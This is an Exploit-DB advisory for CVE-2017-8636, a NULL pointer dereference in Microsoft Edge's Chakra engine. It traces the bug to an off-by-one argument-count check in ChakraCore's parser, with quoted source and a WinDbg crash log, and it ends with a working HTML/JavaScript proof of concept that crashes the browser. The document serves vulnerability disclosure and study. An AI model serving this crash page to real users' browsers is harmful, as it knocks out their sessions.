Microsoft Edge Chakra - NULL Pointer Dereference

EDB-ID: 42467
Author: Huang Anwen
Published: 2017-08-17
CVE: CVE-2017-8636
Type: Dos
Platform: Windows
Vulnerable App: N/A

 Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team 

The issue could lead a nullptr derefrence besides a stack overflow we metioned previously.

// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
Js::ArgSlot EmitArgList(
ParseNode *pnode,
Js::RegSlot rhsLocation,
Js::RegSlot thisLocation,
Js::RegSlot newTargetLocation,
BOOL fIsEval,
BOOL fAssignRegs,
ByteCodeGenerator *byteCodeGenerator,
FuncInfo *funcInfo,
Js::ProfileId callSiteId,
uint16 spreadArgCount = 0,
Js::AuxArray<uint32> **spreadIndices = nullptr)
{
// This function emits the arguments for a call.
// ArgOut's with uses immediately following defs.

EmitArgListStart(thisLocation, byteCodeGenerator, funcInfo, callSiteId);

Js::RegSlot evalLocation = Js::Constants::NoRegister;

//
// If Emitting arguments for eval and assigning registers, get a tmpLocation for eval.
// This would be used while generating frameDisplay in EmitArgListEnd.
//
if (fIsEval)
{
evalLocation = funcInfo->AcquireTmpRegister();
}

if (spreadArgCount > 0) //spreadArgCount==0 because of overflow****
{
const size_t extraAlloc = spreadArgCount * sizeof(uint32);
Assert(spreadIndices != nullptr);
*spreadIndices = AnewPlus(byteCodeGenerator->GetAllocator(), extraAlloc, Js::AuxArray<uint32>, spreadArgCount); //skip initialization of spreadIndices****
}

size_t argIndex = EmitArgs(pnode, fAssignRegs, byteCodeGenerator, funcInfo, callSiteId, spreadIndices == nullptr ? nullptr : *spreadIndices);

Js::ArgSlot argumentsCount = EmitArgListEnd(pnode, rhsLocation, thisLocation, evalLocation, newTargetLocation, byteCodeGenerator, funcInfo, argIndex, callSiteId);

if (fIsEval)
{
funcInfo->ReleaseTmpRegister(evalLocation);
}

return argumentsCount;
}


// ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
size_t EmitArgs(
ParseNode *pnode,
BOOL fAssignRegs,
ByteCodeGenerator *byteCodeGenerator,
FuncInfo *funcInfo,
Js::ProfileId callSiteId,
Js::AuxArray<uint32> *spreadIndices = nullptr
)
{
Js::ArgSlot argIndex = 0;
Js::ArgSlot spreadIndex = 0;

if (pnode != nullptr)
{
while (pnode->nop == knopList)
{
// If this is a put, the arguments have already been evaluated (see EmitReference).
// We just need to emit the ArgOut instructions.
if (fAssignRegs)
{
Emit(pnode->sxBin.pnode1, byteCodeGenerator, funcInfo, false);
}

if (pnode->sxBin.pnode1->nop == knopEllipsis)
{
Assert(spreadIndices != nullptr);
spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this' //nullptr derefrence****
EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->sxBin.pnode1->location, callSiteId, argIndex);
}
else
{
byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->sxBin.pnode1->location, callSiteId);
}
if (fAssignRegs)
{
funcInfo->ReleaseLoc(pnode->sxBin.pnode1);
}

pnode = pnode->sxBin.pnode2;
}

// If this is a put, the call target has already been evaluated (see EmitReference).
if (fAssignRegs)
{
Emit(pnode, byteCodeGenerator, funcInfo, false);
}

if (pnode->nop == knopEllipsis)
{
Assert(spreadIndices != nullptr);
spreadIndices->elements[spreadIndex++] = argIndex + 1; // account for 'this'
EmitSpreadArgToListBytecodeInstr(byteCodeGenerator, funcInfo, pnode->location, callSiteId, argIndex);
}
else
{
byteCodeGenerator->Writer()->ArgOut<true>(++argIndex, pnode->location, callSiteId);
}

if (fAssignRegs)
{
funcInfo->ReleaseLoc(pnode);
}
}

return argIndex;
}

Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff6`56460000 00007ff6`56485000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffd`4cba0000 00007ffd`4cd7b000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffd`4ad90000 00007ffd`4ae3e000 C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffd`49c00000 00007ffd`49e49000 C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffd`475e0000 00007ffd`4765e000 C:\Windows\SYSTEM32\apphelp.dll
ModLoad: 00007ffd`4a1a0000 00007ffd`4a499000 C:\Windows\System32\combase.dll
ModLoad: 00007ffd`499b0000 00007ffd`49aa6000 C:\Windows\System32\ucrtbase.dll
ModLoad: 00007ffd`4b250000 00007ffd`4b375000 C:\Windows\System32\RPCRT4.dll
ModLoad: 00007ffd`49eb0000 00007ffd`49f1a000 C:\Windows\System32\bcryptPrimitives.dll
ModLoad: 00007ffd`4a100000 00007ffd`4a19d000 C:\Windows\System32\msvcrt.dll
ModLoad: 00007ffd`43c40000 00007ffd`43ca0000 C:\Windows\SYSTEM32\wincorlib.DLL
ModLoad: 00007ffd`4b380000 00007ffd`4b440000 C:\Windows\System32\OLEAUT32.dll
ModLoad: 00007ffd`49b60000 00007ffd`49bfa000 C:\Windows\System32\msvcp_win.dll
ModLoad: 00007ffd`490a0000 00007ffd`490b1000 C:\Windows\System32\kernel.appcore.dll
ModLoad: 00007ffd`2c870000 00007ffd`2cc34000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll
ModLoad: 00007ffd`492b0000 00007ffd`499a2000 C:\Windows\System32\Windows.Storage.dll
ModLoad: 00007ffd`4b4f0000 00007ffd`4b591000 C:\Windows\System32\advapi32.dll
ModLoad: 00007ffd`4b1f0000 00007ffd`4b249000 C:\Windows\System32\sechost.dll
ModLoad: 00007ffd`4cb40000 00007ffd`4cb91000 C:\Windows\System32\shlwapi.dll
ModLoad: 00007ffd`4a8e0000 00007ffd`4a907000 C:\Windows\System32\GDI32.dll
ModLoad: 00007ffd`49f20000 00007ffd`4a0a8000 C:\Windows\System32\gdi32full.dll
ModLoad: 00007ffd`4c9f0000 00007ffd`4cb3a000 C:\Windows\System32\USER32.dll
ModLoad: 00007ffd`41cb0000 00007ffd`41f36000 C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffd`490c0000 00007ffd`490de000 C:\Windows\System32\win32u.dll
ModLoad: 00007ffd`4a9c0000 00007ffd`4aa6a000 C:\Windows\System32\shcore.dll
ModLoad: 00007ffd`49030000 00007ffd`4907c000 C:\Windows\System32\powrprof.dll
ModLoad: 00007ffd`49010000 00007ffd`49025000 C:\Windows\System32\profapi.dll
ModLoad: 00007ffd`48310000 00007ffd`48341000 C:\Windows\SYSTEM32\ntmarta.dll
ModLoad: 00007ffd`48f10000 00007ffd`48f39000 C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffd`486a0000 00007ffd`48744000 C:\Windows\SYSTEM32\DNSAPI.dll
ModLoad: 00007ffd`4b030000 00007ffd`4b09c000 C:\Windows\System32\WS2_32.dll
ModLoad: 00007ffd`4a9b0000 00007ffd`4a9b8000 C:\Windows\System32\NSI.dll
ModLoad: 00007ffd`38c70000 00007ffd`38c96000 C:\Windows\SYSTEM32\clipc.dll
ModLoad: 00007ffd`48a60000 00007ffd`48a77000 C:\Windows\SYSTEM32\cryptsp.dll
ModLoad: 00007ffd`4b4a0000 00007ffd`4b4cd000 C:\Windows\System32\IMM32.DLL
ModLoad: 00007ffd`48660000 00007ffd`48697000 C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffd`479c0000 00007ffd`47b30000 C:\Windows\SYSTEM32\twinapi.appcore.dll
ModLoad: 00007ffd`48ee0000 00007ffd`48f05000 C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffd`48140000 00007ffd`48161000 C:\Windows\SYSTEM32\profext.dll
ModLoad: 00007ffd`38a20000 00007ffd`38a94000 C:\Windows\SYSTEM32\msiso.dll
ModLoad: 00007ffd`3e660000 00007ffd`3e682000 C:\Windows\SYSTEM32\EShims.dll
ModLoad: 00007ffd`3d710000 00007ffd`3d72b000 C:\Windows\SYSTEM32\MPR.dll
ModLoad: 00007ffd`4b0a0000 00007ffd`4b1e5000 C:\Windows\System32\ole32.dll
ModLoad: 00007ffd`47830000 00007ffd`478c5000 C:\Windows\system32\uxtheme.dll
ModLoad: 00007ffd`379c0000 00007ffd`37a61000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
ModLoad: 00007ffd`2df90000 00007ffd`2f641000 C:\Windows\SYSTEM32\edgehtml.dll
ModLoad: 00007ffd`2d730000 00007ffd`2df1b000 C:\Windows\SYSTEM32\chakra.dll
ModLoad: 00007ffd`45500000 00007ffd`45639000 C:\Windows\SYSTEM32\wintypes.dll
ModLoad: 00007ffd`3e0a0000 00007ffd`3e0df000 C:\Windows\SYSTEM32\MLANG.dll
ModLoad: 00007ffd`45c20000 00007ffd`45c96000 C:\Windows\SYSTEM32\policymanager.dll
ModLoad: 00007ffd`45b90000 00007ffd`45c1f000 C:\Windows\SYSTEM32\msvcp110_win.dll
ModLoad: 00007ffd`45fb0000 00007ffd`46146000 C:\Windows\SYSTEM32\PROPSYS.dll
ModLoad: 00007ffd`39b50000 00007ffd`39c1b000 C:\Windows\System32\ieproxy.dll
ModLoad: 00007ffd`436b0000 00007ffd`437b6000 C:\Windows\System32\Windows.UI.dll
ModLoad: 00007ffd`435e0000 00007ffd`43662000 C:\Windows\SYSTEM32\TextInputFramework.dll
ModLoad: 00007ffd`46eb0000 00007ffd`46f93000 C:\Windows\SYSTEM32\CoreMessaging.dll
ModLoad: 00007ffd`44b90000 00007ffd`44e62000 C:\Windows\SYSTEM32\CoreUIComponents.dll
ModLoad: 00007ffd`45b70000 00007ffd`45b85000 C:\Windows\SYSTEM32\usermgrcli.dll
ModLoad: 00007ffd`44040000 00007ffd`44571000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
ModLoad: 00007ffd`4b5a0000 00007ffd`4c9d7000 C:\Windows\System32\shell32.dll
ModLoad: 00007ffd`4a0b0000 00007ffd`4a0f9000 C:\Windows\System32\cfgmgr32.dll
ModLoad: 00007ffd`46150000 00007ffd`4617a000 C:\Windows\SYSTEM32\dwmapi.dll
ModLoad: 00007ffd`39200000 00007ffd`3952e000 C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffd`4ac20000 00007ffd`4ad86000 C:\Windows\System32\msctf.dll
ModLoad: 00007ffd`48f40000 00007ffd`48f70000 C:\Windows\SYSTEM32\SspiCli.dll
ModLoad: 00007ffd`43860000 00007ffd`43962000 C:\Windows\SYSTEM32\mrmcorer.dll
ModLoad: 00007ffd`36760000 00007ffd`36770000 C:\Windows\SYSTEM32\tokenbinding.dll
ModLoad: 00007ffd`43ba0000 00007ffd`43c09000 C:\Windows\SYSTEM32\Bcp47Langs.dll
ModLoad: 00007ffd`396b0000 00007ffd`396cb000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll
ModLoad: 00007ffd`400d0000 00007ffd`401a7000 C:\Windows\SYSTEM32\winhttp.dll
ModLoad: 00007ffd`488c0000 00007ffd`4891c000 C:\Windows\system32\mswsock.dll
ModLoad: 00007ffd`42450000 00007ffd`4245b000 C:\Windows\SYSTEM32\WINNSI.DLL
ModLoad: 00007ffd`41940000 00007ffd`41b08000 C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffd`48a80000 00007ffd`48a8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffd`36f20000 00007ffd`36f3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll
ModLoad: 00007ffd`38ae0000 00007ffd`38c6a000 C:\Windows\SYSTEM32\ieapfltr.dll
ModLoad: 00007ffd`47670000 00007ffd`4768d000 C:\Windows\System32\rmclient.dll
ModLoad: 00007ffd`34410000 00007ffd`34457000 C:\Windows\system32\dataexchange.dll
ModLoad: 00007ffd`46fa0000 00007ffd`470c2000 C:\Windows\SYSTEM32\dcomp.dll
ModLoad: 00007ffd`46620000 00007ffd`468ff000 C:\Windows\SYSTEM32\d3d11.dll
ModLoad: 00007ffd`47e80000 00007ffd`47f24000 C:\Windows\SYSTEM32\dxgi.dll
ModLoad: 00007ffd`35bb0000 00007ffd`35bc8000 C:\Windows\System32\UiaManager.dll
ModLoad: 00007ffd`37e60000 00007ffd`37ee2000 C:\Windows\system32\twinapi.dll
ModLoad: 00007ffd`2d700000 00007ffd`2d728000 C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffd`490e0000 00007ffd`492a9000 C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffd`49080000 00007ffd`49091000 C:\Windows\System32\MSASN1.dll
ModLoad: 00007ffd`30870000 00007ffd`308ea000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll
ModLoad: 00007ffd`385b0000 00007ffd`3860d000 C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffd`46900000 00007ffd`46ea4000 C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffd`40390000 00007ffd`4064f000 C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ffd`30470000 00007ffd`304ca000 C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffd`2d6f0000 00007ffd`2d6ff000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffd`448a0000 00007ffd`448e2000 C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffd`44680000 00007ffd`446e7000 C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ffd`37780000 00007ffd`377eb000 C:\Windows\System32\oleacc.dll
ModLoad: 00007ffd`2d6e0000 00007ffd`2d6f0000 C:\Windows\system32\msimtf.dll
ModLoad: 00007ffd`40030000 00007ffd`400b8000 C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ffd`39af0000 00007ffd`39b04000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffd`3f270000 00007ffd`3f2a8000 C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffd`377f0000 00007ffd`379b5000 C:\Windows\System32\uiautomationcore.dll
ModLoad: 00007ffd`40200000 00007ffd`40388000 C:\Windows\SYSTEM32\windows.globalization.dll
(18bc.14e0): Access violation - code c0000005 (!!! second chance !!!)
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> r
rax=0000000000000000 rbx=0000006a8f7faeb0 rcx=0000000000000001
rdx=0000019df75e3040 rsi=0000000000000002 rdi=0000006a8f7fa9c0
rip=00007ffd2da3132f rsp=0000006a8f7fb0f0 rbp=0000006a8f7fb8f0
r8=0000000000000000 r9=0000000000000000 r10=0000000000000009
r11=0000019df75ff04d r12=0000000000000001 r13=0000000000000000
r14=0000006a8f7fb8f0 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx ds:00000000`00000004=????????
0:016> ub
chakra!EmitArgListEnd+0xdde2c:
00007ffd`2da3130c 0f856022f2ff jne chakra!EmitArgListEnd+0x92 (00007ffd`2d953572)
00007ffd`2da31312 0fb7c6 movzx eax,si
00007ffd`2da31315 e95b22f2ff jmp chakra!EmitArgListEnd+0x95 (00007ffd`2d953575)
00007ffd`2da3131a 410fb7c4 movzx eax,r12w
00007ffd`2da3131e 664403e2 add r12w,dx
00007ffd`2da31322 0fb7cf movzx ecx,di
00007ffd`2da31325 03ca add ecx,edx
00007ffd`2da31327 488b942498000000 mov rdx,qword ptr [rsp+98h]
0:016> u
chakra!EmitArgs+0xddda3:
00007ffd`2da3132f 41894c8504 mov dword ptr [r13+rax*4+4],ecx
00007ffd`2da31334 488d4c2440 lea rcx,[rsp+40h]
00007ffd`2da31339 488b4328 mov rax,qword ptr [rbx+28h]
00007ffd`2da3133d 48894c2420 mov qword ptr [rsp+20h],rcx
00007ffd`2da31342 488bcd mov rcx,rbp
00007ffd`2da31345 448b400c mov r8d,dword ptr [rax+0Ch]
00007ffd`2da31349 e8229c2300 call chakra!EmitSpreadArgToListBytecodeInstr (00007ffd`2dc6af70)
00007ffd`2da3134e 0fb77c2440 movzx edi,word ptr [rsp+40h]
0:016> kb
RetAddr : Args to Child : Call Site
00007ffd`2d953484 : 0000019d`f64e8aa0 00007ffd`00000001 0000006a`8f7fb8f0 0000019d`f75e3040 : chakra!EmitArgs+0xddda3
00007ffd`2d952850 : 0000019d`f64e8aa0 0000019d`ffffffff 0000019d`ffffffff 0000006a`ffffffff : chakra!EmitArgList+0x9c
00007ffd`2d8d3768 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!EmitNew+0x16c
00007ffd`2d8d2c55 : 0000019d`f64e8940 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 : chakra!Emit+0x15d8
00007ffd`2d8dd790 : 0000019d`f64e8810 0000006a`8f7fb8f0 0000019d`f75e3040 0000006a`00000001 : chakra!Emit+0xac5
00007ffd`2d8db4b9 : 0000006a`8f7fb8f0 0000019d`f64e8810 0000019d`f75e3040 0000006a`00000001 : chakra!ByteCodeGenerator::EmitTopLevelStatement+0x80
00007ffd`2d8daee5 : 0000006a`8f7fb8f0 0000019d`f75e3040 00000000`00000000 0000019d`f75e3040 : chakra!ByteCodeGenerator::EmitGlobalBody+0x75
00007ffd`2d8da274 : 0000006a`8f7fb8f0 0000019d`f64e8030 0000019d`f75e3030 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitOneFunction+0xa75
00007ffd`2d9826aa : 0000006a`8f7fb8f0 0000019d`f64e8030 00000000`00000000 0000006a`8f7fb8f0 : chakra!ByteCodeGenerator::EmitScopeList+0x164
00007ffd`2d982541 : 0000019d`f64e8030 0000019d`00003c22 0000006a`8f7fb8f0 0000006a`8f7fbb30 : chakra!ByteCodeGenerator::Generate+0x142
00007ffd`2d7a2820 : 0000019d`f64e8030 0000019d`00003c22 0000019d`f2b2d110 0000006a`8f7fbb30 : chakra!GenerateByteCode+0x8d
00007ffd`2d748201 : 0000019d`f2b2d110 0000019d`f67c0020 0000019d`00050022 0000006a`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x380
00007ffd`2d747fb8 : 0000019d`f6260000 00007ffd`2de79f80 0000019d`00000000 0000019d`f625c000 : chakra!Js::GlobalObject::VEval+0x231
00007ffd`2d747ecd : 0000006a`8f7fc0d0 0000019d`f625b5c0 0000019d`f2b2a150 0000006a`8f7fc090 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ffd`2d9a6be3 : 0000019d`f625b5c0 00000000`18000003 0000019d`f6270020 0000019d`f628ef00 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000018 0000006a`8f7fc330 00000000`00000006 : chakra!amd64_CallFunction+0x93
00007ffd`2d7571ac : 0000019d`f625b5c0 00007ffd`2d747e50 0000006a`8f7fc1a0 0000006a`8f7fc330 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d7577b4 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`f625b5c0 00007ffd`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ffd`2d834920 : 0000006a`8f7fc330 0000019d`f64e009a 0000019d`8f7fc330 0000019d`f64e00a8 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ffd`2d82ff2c : 0000006a`8f7fc330 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ffd`2d8c80cc : 0000006a`8f7fc330 0000019d`f64c0000 0000006a`8f7fc4f0 00007ffd`4cc05401 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ffd`2d8c7be1 : 0000019d`f6280420 0000006a`8f7fc6d0 0000019d`f6500fc2 0000006a`8f7fc6e8 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000019d`f6500fc2 : 0000006a`8f7fc720 00000000`00000000 00000000`00000000 00007ffd`2d9a6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ffd`2d9a6be3 : 0000019d`f6280420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x19d`f6500fc2
00007ffd`2d896bf3 : 0000019d`f2b2a150 00000000`00000000 0000019d`f2b50c00 00007ffd`2d8aa837 : chakra!amd64_CallFunction+0x93
00007ffd`2d8c1810 : 0000019d`f6280420 00007ffd`2d9a6df0 0000006a`8f7fc820 0000019d`f2b2d110 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffd`2d8c0a37 : 0000019d`f6280420 0000006a`8f7fc910 0000019d`f2b2d110 00007ffd`4a167100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ffd`2d98907e : 0000019d`f6280420 0000006a`8f7fc970 0000019d`f2b2d110 0000019d`f2b2da00 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ffd`2d8ecd54 : 0000019d`f6280420 0000006a`8f7fc9b0 00000000`00000000 0000006a`8f7fc9c8 : chakra!ScriptSite::CallRootFunction+0x6a
00007ffd`2d881b49 : 0000019d`f2b2d000 0000019d`f6280420 0000006a`8f7fca60 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ffd`2d882e8e : 0000019d`f2b29d00 0000006a`8f7fcf68 0000006a`8f7fcfa0 0000006a`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ffd`2d883121 : 0000019d`f2b29d00 0000019d`f370c4c4 00000000`00000000 0000019d`f2cb4330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ffd`2e393c75 : 0000019d`f2b29d50 0000019d`f370c4c4 0000019d`0000008a 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ffd`2e393abe : 00000000`00000000 0000006a`8f7fce39 0000019d`f2cb4260 0000019d`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ffd`2e3935d7 : 00000000`00000000 0000019d`f2cb4260 0000019d`f2c3c1c0 0000019d`f2cb41b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ffd`2e392f07 : 0000019d`f2c50c01 0000019d`f2cac100 0000019d`00000082 00007ffd`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ffd`2e452f8d : 00000000`ffffffff 0000019d`f2c3c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ffd`2e2943d4 : 00000000`00000000 0000019d`f2c8c440 00000000`00000001 00007ffd`2e44ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ffd`2e2934a1 : 0000019d`f2c50c00 00000000`00000000 0000019d`f2c50c00 0000019d`f2c2c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ffd`2e44d23b : 00000000`00019717 0000019d`f2c20000 0000019d`f2c800b0 0000019d`f2c2c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ffd`2e44d11f : 0000019d`f2c2c8c0 00000000`00019717 0000019d`f37e6dc0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ffd`2e44cfd3 : 0000019d`f2c20000 00000000`06363701 00000000`00000002 0000019d`f2c61740 : edgehtml!PostManExecute+0x63
00007ffd`2e44ce6d : 0000019d`f2c2c8c0 00000000`06363729 0000019d`00000000 00007ffd`41cd4779 : edgehtml!PostManResume+0xa3
00007ffd`2e45b353 : 0000019d`f2c48600 0000019d`f3734bd0 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ffd`2e4350db : 0000019d`f2c282d0 0000019d`f2b25491 0000019d`f2b02200 0000006a`8f7fd4f0 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ffd`2e2c1706 : 0000019d`f2b02728 0000019d`f2c61740 0000019d`f2b02260 0000006a`8f7fd520 : edgehtml!GWndAsyncTask::Run+0x1b
00007ffd`2e40a860 : 00000000`0e877146 0000019d`f2c617a0 0000019d`f2c800b0 00007ffd`2e369138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ffd`2e40a683 : 0000019d`f3734bd0 00000000`00000000 00000000`00000002 0000019d`f2c28170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ffd`2e2c22b3 : 0000006a`8f7fd9d0 00000000`00008002 0000019d`f2c28170 00007ffd`4ca147df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ffd`2e2c07a5 : 00000000`00008002 0000019d`f2c20000 000042e1`6a33249e 00007ffd`2e33721d : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffd`4c9fbc50 : 00000000`00010442 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffd`4c9fb5cf : 00000195`f12868c0 00007ffd`2e2c0680 00000000`00010442 00000000`00010442 : USER32!UserCallWinProcCheckWow+0x280
00007ffd`2c876d0e : 0000006a`8f7fd970 00000000`00000000 00000195`f0cd3840 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ffd`2c88eecb : 00000000`00000000 00000000`00000001 00000195`f0f29cd0 00000195`f0cc3960 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ffd`38a2b4a8 : 00000000`00000000 00000195`f0f28990 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffd`4ada2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffd`4cc10d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


The root cause of the nullptr derefrencing is an overflow in Parser::ParseArgList
//ChakraCore-master\lib\Parser\Parse.cpp
/***************************************************************************
Parse a list of arguments.
***************************************************************************/
template<bool buildAST>
ParseNodePtr Parser::ParseArgList( bool *pCallOfConstants, uint16 *pSpreadArgCount, uint16 * pCount)
{
ParseNodePtr pnodeArg;
ParseNodePtr pnodeList = nullptr;
ParseNodePtr *lastNodeRef = nullptr;

// Check for an empty list
Assert(m_token.tk == tkLParen);

if (m_pscan->Scan() == tkRParen)
{
return nullptr;
}

*pCallOfConstants = true;
*pSpreadArgCount = 0;

int count=0;
while (true)
{
// the count of arguments has to fit in an unsigned short
if (count > 0xffffU) //SHOULD BE if (count >= oxffffU)
Error(ERRnoMemory);
// Allow spread in argument lists.
IdentToken token;
pnodeArg = ParseExpr<buildAST>(koplCma, nullptr, TRUE, /* fAllowEllipsis */TRUE, NULL, nullptr, nullptr, &token);
++count; //when count==0xffffU, an overflow occurs HERE!!!
this->MarkEscapingRef(pnodeArg, &token);

if (buildAST)
{
this->CheckArguments(pnodeArg);

if (*pCallOfConstants && !IsConstantInFunctionCall(pnodeArg))
{
*pCallOfConstants = false;
}

if (pnodeArg->nop == knopEllipsis)
{
(*pSpreadArgCount)++;
}

AddToNodeListEscapedUse(&pnodeList, &lastNodeRef, pnodeArg);
}
if (m_token.tk != tkComma)
{
break;
}
m_pscan->Scan();

if (m_token.tk == tkRParen && m_scriptContext->GetConfig()->IsES7TrailingCommaEnabled())
{
break;
}
}

if (pSpreadArgCount!=nullptr && (*pSpreadArgCount) > 0){
CHAKRATEL_LANGSTATS_INC_LANGFEATURECOUNT(SpreadFeature, m_scriptContext);
}

*pCount = static_cast<uint16>(count);
if (buildAST)
{
AssertMem(lastNodeRef);
AssertNodeMem(*lastNodeRef);
pnodeList->ichLim = (*lastNodeRef)->ichLim;
}

return pnodeList;
}
-->
<html>
<head>
<title> POC </title>
</head>
<script>

var a=[];
a.length=0xFFFF+1;
a.fill('...a');
var b="function Car(){}; var car=new Car("+a.join()+");";
//alert(b);
eval(b);

</script>
</html>

Related Posts